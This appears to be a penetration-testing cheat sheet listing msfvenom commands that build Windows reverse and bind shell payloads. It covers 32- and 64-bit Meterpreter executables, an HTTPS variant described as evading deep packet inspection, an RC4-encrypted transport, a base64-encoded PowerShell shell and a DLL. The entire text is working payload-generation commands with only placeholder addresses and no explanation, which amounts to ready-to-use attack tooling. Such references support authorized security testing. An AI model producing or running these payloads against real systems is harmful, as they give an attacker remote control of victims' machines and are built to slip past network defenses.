Windows β€” Reverse & Bind Shells

Reverse TCP Shells

x86 (32-bit)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

x64 (64-bit)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

HTTPS (x64) β€” evades DPI

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > shell.exe

RC4 encrypted transport

msfvenom -p windows/meterpreter/reverse_tcp_rc4 \
  LHOST=<ip> LPORT=<port> RC4PASSWORD=MyKey -f exe > shell.exe

Bind Shells

x64 bind TCP

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=<port> -f exe > bind.exe

PowerShell

msfvenom -a x86 --platform Windows \
  -p windows/powershell_reverse_tcp LHOST=<ip> LPORT=<port> \
  -e cmd/powershell_base64 -i 3 -f raw > shell.ps1

DLL

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f dll > shell.dll